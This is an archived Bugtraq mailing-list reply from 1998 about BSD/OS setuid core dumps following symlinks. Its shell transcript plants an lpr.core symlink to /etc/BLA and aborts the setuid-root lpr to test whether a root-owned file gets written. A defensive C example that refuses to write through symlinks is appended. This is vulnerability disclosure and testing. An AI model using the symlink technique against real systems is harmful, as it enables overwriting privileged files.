Bugtraq mailing list archives
Re: BSD coredumps follow symlinks
From: scorpios () CS HUJI AC IL (Nir Soffer)
Date: Thu, 2 Apr 1998 11:48:46 +0300
On Tue, 31 Mar 1998, Denis Papp wrote:
> I have a system running BSD/OS 2.1 with all the patches from BSDi, including K210-029 which I quote: "This patch addresses a security problem with core dumps from setuid programs."
That's very weird. Back when I found the same bug in BSDI 3.0 I tried the same in BSDi 2.1 and it didn't work. Maybe we used a different patch, but this is the transcript:

jupiter[ /tmp ] uname -a
BSD/OS jupiter.cs.huji.ac.il 2.1 BSDI BSD/OS 2.1 Kernel #4: Tue Oct 8 08:49:52 IST 1996 danny () chamsa cs huji ac il:/sys/compile/CHAMSA i386
jupiter[ /tmp ] ls -la lpr.core
lrwxrwxrwt 1 root wheel 8 Apr 2 11:37 lpr.core@ -> /etc/BLA
jupiter[ /tmp ] lpr &
[1] 29989
jupiter[ /tmp ]
[1] + Suspended (tty input) lpr
jupiter[ /tmp ] kill -6 %1
jupiter[ /tmp ] fg
lpr
IOT trap
jupiter[ /tmp ] ls -la /etc/BLA
ls: /etc/BLA: No such file or directory
jupiter[ /tmp ]
jupiter[ /tmp ] ls -la `which lpr`
-rwsr-sr-x 1 root daemon 26533 Feb 19 1996 /usr/local/bin/lpr*
jupiter[ /tmp ]

lpr will dump core if there is no symlink there. Maybe you failed to install the patch correctly?

Regards,
Nir.

--
Nir Soffer * scorpios () cs huji ac il * http://www.cs.huji.ac.il/~scorpios
"I wouldn't recommend sex drugs or insanity for everyone but they've always worked for me." -- Hunter S. Thompson
Mail me with the subject 'get pgp key' for my PGP Public key.
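The behaviour the transcript above checks for (a symlink named lpr.core must not cause a write to its target, while a dump is still written when no symlink is present) expressed as user-space C. This is an added example, not part of the original post and not BSD/OS kernel code; the helper names `open_dump_nofollow` and `try_dump` and the temporary-directory paths are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not kernel code): create a dump file without writing
 * through a planted symlink. O_CREAT|O_EXCL fails if the name already exists,
 * dangling symlinks included; O_NOFOLLOW is a second guard. */
int open_dump_nofollow(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Only write to a regular file with a single link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Rebuilds the transcript's layout in a private temp directory (constructed
 * paths): lpr.core, optionally a symlink to a nonexistent BLA.
 * Returns 1 if a dump was written, 0 if it was refused and BLA stayed absent,
 * -1 on setup failure or if BLA was created through the link. */
int try_dump(int plant_symlink)
{
    char dir[] = "/tmp/coredemoXXXXXX", core[64], target[64];
    struct stat st;
    int fd, result;
    if (!mkdtemp(dir))
        return -1;
    snprintf(core, sizeof core, "%s/lpr.core", dir);
    snprintf(target, sizeof target, "%s/BLA", dir);
    if (plant_symlink && symlink(target, core) != 0) {
        rmdir(dir);
        return -1;
    }
    fd = open_dump_nofollow(core);
    result = (fd < 0) ? 0 : (write(fd, "core", 4) == 4 ? 1 : -1);
    if (fd >= 0)
        close(fd);
    if (lstat(target, &st) == 0)
        result = -1;            /* the write went through the link */
    unlink(target); unlink(core); rmdir(dir);
    return result;
}
```

`try_dump(1)` corresponds to the planted-symlink case in the transcript and `try_dump(0)` to the remark that lpr dumps core when no symlink is there.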